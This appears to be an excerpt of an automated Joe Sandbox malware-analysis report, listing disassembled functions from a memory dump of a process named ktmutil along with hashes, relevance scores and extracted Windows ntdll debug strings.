                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                          • API String ID: 0-484625025
                                                                          • Opcode ID: e009565eb17cf7e0d5f3d495fe25a5838c887fc53bf855ec9a4b625f41186788
                                                                          • Instruction ID: ce14d0e14ea01b27c8ab75d0c4535213292f1beb53462244d55ac030f39fabca
                                                                          • Opcode Fuzzy Hash: e009565eb17cf7e0d5f3d495fe25a5838c887fc53bf855ec9a4b625f41186788
                                                                          • Instruction Fuzzy Hash: 38510635A003196EDB24EBA9DCC5FFE77BCEF05308F4440A9E605AB291E7719A418B50
                                                                          Function 03406940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                          • Instruction ID: 042a9de0537d21ce435fe4f0758e0809c7b636fc0ec0e155cae3279587714d11
                                                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                          • Instruction Fuzzy Hash: 80023575608341AFD304DF28C490A6BBBF5EFC8700F05892EF9999B2A4DB35E905CB56
                                                                          Function 0337B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-$0$0
                                                                          • API String ID: 1302938615-699404926
                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction ID: 8bcfd3f51f991cd356edf5280008a103a60722e9b52c59641f6da1e6b93e04e0
                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction Fuzzy Hash: B5819074E05289AEDF34CE68C8D17FEFBB5AF45360F1C4259E861AB390C73899408B64
                                                                          Function 033E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$[$]:%u
                                                                          • API String ID: 48624451-2819853543
                                                                          • Opcode ID: f3a07d784721f5dcba72821def7dd2fbc4c6ae7db09da1aff036c4d792cf313a
                                                                          • Instruction ID: 3d2efd1e6de992e7eb8c6a247df100b92f88a3448847767661fa9b15b622de69
                                                                          • Opcode Fuzzy Hash: f3a07d784721f5dcba72821def7dd2fbc4c6ae7db09da1aff036c4d792cf313a
                                                                          • Instruction Fuzzy Hash: 9B21677AE00229ABDB10EF79CC809EFB7FCEF54650F480515E915E7240E735DA058B91
                                                                          Function 0335F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 033A031E
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033A02E7
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033A02BD
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                          • API String ID: 0-2474120054
                                                                          • Opcode ID: 96a16868dc427f3a065347153c68b3478d754fc0e040704174501d28fa99e35b
                                                                          • Instruction ID: 437e2469649998cca6c8fa11ec96c069577005ed4a89f73e452acc863c8f3f77
                                                                          • Opcode Fuzzy Hash: 96a16868dc427f3a065347153c68b3478d754fc0e040704174501d28fa99e35b
                                                                          • Instruction Fuzzy Hash: E8E19C34604B41DFD728CF28C8C4B6AB7E4FB88314F184A69F9A58B6E1D774D945CB42
                                                                          Function 0336BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 033A7BAC
                                                                          • RTL: Resource at %p, xrefs: 033A7B8E
                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 033A7B7F
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 0-871070163
                                                                          • Opcode ID: 778f3610cc060eccc8c9b23e3f192b4477a872bb81f3dde8e82e9c2445b6bc7d
                                                                          • Instruction ID: 7d52cc9a83c15f7016bc0cbcfe147df8626b1fa6f84c5230747718fbedae6495
                                                                          • Opcode Fuzzy Hash: 778f3610cc060eccc8c9b23e3f192b4477a872bb81f3dde8e82e9c2445b6bc7d
                                                                          • Instruction Fuzzy Hash: 3D419D357017029FC724DA6ACCC0B6AF7E9EB88710F144A2DE95ADF690DB71E8058F91
                                                                          Function 0336B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033A728C
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 033A72C1
                                                                          • RTL: Resource at %p, xrefs: 033A72A3
                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 033A7294
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 885266447-605551621
                                                                          • Opcode ID: 682e6953a81da2a4605136670f444597cd0ee6ffd89782d769c6e6ade0a1cdb8
                                                                          • Instruction ID: d34ebea0a057e4bc556911e11a4a49b00947e690c439a05b0e144202ace073ce
                                                                          • Opcode Fuzzy Hash: 682e6953a81da2a4605136670f444597cd0ee6ffd89782d769c6e6ade0a1cdb8
                                                                          • Instruction Fuzzy Hash: 5641FF35B00B06AFC721DE69CCC1B6AF7A9FF84710F144629F995EB640DB21E8528BD1
                                                                          Function 033E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$]:%u
                                                                          • API String ID: 48624451-3050659472
                                                                          • Opcode ID: e9ae655b1dc3bc7e3f71e34a7f3a1e54a4192c51c100f3cfcb5a99cd31215945
                                                                          • Instruction ID: fe74221f18d27b38d8a758b61af92e409663784643dfcc52f47fad79b8f51aab
                                                                          • Opcode Fuzzy Hash: e9ae655b1dc3bc7e3f71e34a7f3a1e54a4192c51c100f3cfcb5a99cd31215945
                                                                          • Instruction Fuzzy Hash: E0314876A002299FDB60EF29DC80BEFB7FCEF44650F444556E849E7240EB309A458F60
                                                                          Function 03377D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-
                                                                          • API String ID: 1302938615-2137968064
                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction ID: 1188f55f68dda7790c844437d2a5ac53c625de06af632b470c95c1bf52cf1a6b
                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction Fuzzy Hash: 1991B270E0021A9BDB34DF69CDC5ABEB7A5EF44320F18461AE865EB6D0D73C9942CB50
                                                                          Function 03339126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$@
                                                                          • API String ID: 0-1194432280
                                                                          • Opcode ID: 3b5e93385d0931a11f200563d9383557f7ba7e5ae91807c694ff7a3b18fa2e13
                                                                          • Instruction ID: 23aeeb79664e049d612244274ce86437f384dfee2462f3e96e639fcc59e62424
                                                                          • Opcode Fuzzy Hash: 3b5e93385d0931a11f200563d9383557f7ba7e5ae91807c694ff7a3b18fa2e13
                                                                          • Instruction Fuzzy Hash: 55811976D01669DBDB31DF54CC84BEAB7B8AB08710F0445EAA919B7680D7709E84CFA0
                                                                          Function 033BCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 033BCFBD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: CallFilterFunc@8
                                                                          • String ID: @$@4Qw@4Qw
                                                                          • API String ID: 4062629308-2383119779
                                                                          • Opcode ID: a414b3fc98107cbbadd2e3c5637af35b87dc7d3daa985c7009262cf0a87eef52
                                                                          • Instruction ID: 5192f3c45b1055e374b36b033b6d573336dbefdd677cf3f64cad9deef03527db
                                                                          • Opcode Fuzzy Hash: a414b3fc98107cbbadd2e3c5637af35b87dc7d3daa985c7009262cf0a87eef52
                                                                          • Instruction Fuzzy Hash: 98419DB9E002249FCB21DFA5C880AAEBBF8EF45714F14416AEA14EF654D738D801CB64